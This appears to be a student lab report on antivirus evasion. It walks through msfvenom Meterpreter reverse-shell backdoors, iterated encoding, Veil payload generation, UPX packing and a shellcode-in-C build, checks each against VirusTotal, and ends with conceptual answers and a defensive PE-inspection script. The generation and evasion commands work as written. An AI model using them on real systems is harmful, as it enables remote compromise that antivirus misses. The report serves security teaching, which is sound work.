1. Proper use of the msf encoder
Scan the meter_backdoor.exe generated in the second experiment on VirusTotal and VirScan.
Try encoding the backdoor with the msf encoder once and then several times; the encoded file is still detected. Encoding once:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.26 LPORT=5215 -f exe > encoded1.exe
Use -i to set the number of iterations; after encoding ten times, the detection result is still unsatisfactory:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.196.133 LPORT=5121 -f exe > encoded10.exe
2. Generating a jar and other file types with msfvenom
Generate a Java backdoor with the following command and scan it:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5124 -f jar > meter_backdoor_java.jar
Generate a PHP backdoor with the following command and scan it:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5124 -f raw > meter_backdoor.php
Generate an Android backdoor with the following command and scan it:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5124 -f raw > Android_backdoor.apk
3. Veil
Installing Veil gave me plenty of trouble: I tried a variety of methods, repeated the process a dozen times, and for a few days ran into all sorts of inexplicable bugs before it inexplicably started working. Here I describe the installation experience in detail.
First, add the USTC and Alibaba Cloud sources, then run the following commands:
apt-get update
apt-get upgrade -y
apt-get install veil-evasion   # install the dependencies
veil   # run the installation
The first problem: the download is excruciatingly slow or fails outright. After searching Baidu I tried the following methods:
1: Change the hosts settings.
Failure.
2: Use git config --global http.proxy 'socks5://127.0.0.1:1080'
Failure.
3: cd /usr/share/veil/config/ to enter the config folder,
then open setup.sh in vim and, on line 260, replace the GitHub repository with the Gitee mirror: https://gitee.com/spears/VeilDependencies.git
Success!!!
Continue the installation
(use the default installation, option s)
(finally the installation completes)
Enter the veil command, then enter use evasion to reach the following page
Enter use c/meterpreter/rev_tcp.py to open the configuration interface
Set the callback IP and port: set LHOST 192.168.198.128 (the Kali IP) and set LPORT 5124
Enter generate to produce the files, then enter the payload name when prompted: veil_c_5124. As shown in the figure, a C-language file is generated; the payload module is a TCP reverse-connection type, and the handler is saved at /var/lib/veil/output/handlers/veil_c_5124.rc
Scan the file with VirusTotal.
(It got through; the people who built this really did put in the effort.)
4. Packing tools
Add a UPX compression shell: enter upx meter_backdoor.exe -o <output>.upxed.exe
5. C + shellcode programming
Use the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.1 LPORT=5124 -f c to generate the shellcode.
Create a file test.c and assign the shellcode to unsigned char buf[] in it.
Enter i686-w64-mingw32-g++ test.c -o 20175124.exe to compile; the resulting executable is then scanned.
6. Using other methods not covered in class
Enter the Veil evasion platform again (remember to enter use evasion)
Enter list to view the available payloads
This time we use Python: enter use python/meterpreter/rev_tcp.py to open the configuration page.
Enter set LHOST 192.168.198.128 and set LPORT 5124 to set the reverse-connection IP address and port number.
Enter generate to generate the file, and enter the file name when prompted: 20175124
Scan the file with VirusTotal
9. Answers to the basic questions
(1) How does antivirus software detect malicious code?
Scan the sample with off-the-shelf antivirus software to determine whether the code contains a virus.
On the Windows platform, binary executables (.exe and .dll) are organized in the PE file format; on the Linux platform the executable file format is ELF.
Malicious code authors sometimes place a specific URL or e-mail address in their work, or the malicious code uses particular library files and functions. Using string extraction, we can analyze the structure and function of the malicious code.
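As an added example that is not part of the original report, the following Python script applies the two static clues just mentioned to two constructed sample binaries: it walks the PE header to list the section table (which also exposes the UPX0/UPX1 section names left behind by the packer used in section 4) and extracts printable strings to look for URLs and e-mail addresses. The PE layout follows the documented format; the sample files, hostnames and addresses are made up for the example.

```python
import re
import struct

# Added example (not part of the original report): a small PE inspector that
# applies the two detection ideas above. The PE layout follows the documented
# format; the sample binaries at the bottom are constructed here, not real files.

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_LEN = 20      # fixed-size COFF file header
SECTION_HEADER_LEN = 40   # each IMAGE_SECTION_HEADER entry
URL_RE = re.compile(r"https?://[\w.\-/:%?=&]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def parse_section_names(data):
    """Return the section names of a PE image, or [] if it is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return []
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + COFF_HEADER_LEN + opt_size   # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_LEN
        raw = data[off:off + 8]
        if len(raw) < 8:
            break   # truncated section table
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(data):
    """Heuristic: UPX names its sections UPX0/UPX1 and embeds a 'UPX!' marker."""
    return any(n.startswith("UPX") for n in parse_section_names(data)) or b"UPX!" in data


def extract_strings(data, min_len=6):
    """Printable-ASCII runs of at least min_len bytes (what the strings tool prints)."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_indicators(data):
    """Summarise the static clues an analyst would look at first."""
    urls, emails = set(), set()
    for s in extract_strings(data):
        urls.update(URL_RE.findall(s))
        emails.update(EMAIL_RE.findall(s))
    return {
        "sections": parse_section_names(data),
        "upx": looks_upx_packed(data),
        "urls": sorted(urls),
        "emails": sorted(emails),
    }


def build_sample(section_names, payload):
    """Constructed minimal PE: DOS header, PE signature, COFF header, zeroed
    32-bit optional header, section table, then arbitrary trailing bytes."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after DOS header
    opt_size = 0xE0                                   # size of the PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x102)
    sections = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + PE_SIGNATURE + coff + bytes(opt_size) + sections + payload


# Constructed samples: one mimicking a UPX-packed file with embedded indicators,
# one plain file. The hostnames use the reserved .invalid TLD.
PACKED_SAMPLE = build_sample(
    ["UPX0", "UPX1", ".rsrc"],
    b"UPX!\0 http://example.invalid/c2 contact: dev@example.invalid \0",
)
CLEAN_SAMPLE = build_sample([".text", ".data"], b"hello world, nothing to see here")

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, find_indicators(blob))
```

Run it on a real file by passing the file's bytes to find_indicators; the section-name and marker checks are only heuristics (a packer can rename sections), which is exactly why antivirus products combine several such clues rather than relying on one.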
(2) What does AV evasion do?
AV evasion modifies the PE code or configuration file so that the program escapes detection by antivirus software.
(3) What are the basic methods of AV evasion?
Changing the signature: the msf encoding, Veil, packers and shellcode used in this experiment each produce a different signature.
Changing behaviour: use reverse connections, tunnelling, encrypted data communication, and so on.
(4) Can enabling antivirus software absolutely prevent malicious code on a computer?
No. Some antivirus software relies on signature recognition and no longer detects the code once its signature changes, so enabling antivirus software cannot completely prevent malicious code.
10. Practice and experience summary
This was the most painful experiment I have done. It could have been finished earlier, but installing Veil was too gruelling and dragged on for about two or three days. I referred to the installation methods of students from previous years and read through countless posts; each attempt took forty minutes to two or three hours, back and forth a dozen times, until it was finally installed, and at that moment I felt a glimmer of emptiness and relief. The experiment was about AV evasion: in many ways the backdoor finally got past the antivirus software and the scanning site lowered its vigilance, but this is only one-tenth of the skill of antivirus software, and building a qualified antivirus product must be very difficult. Only by knowing the capabilities of this backdoor software can we do network security well and fulfil our duties in the future.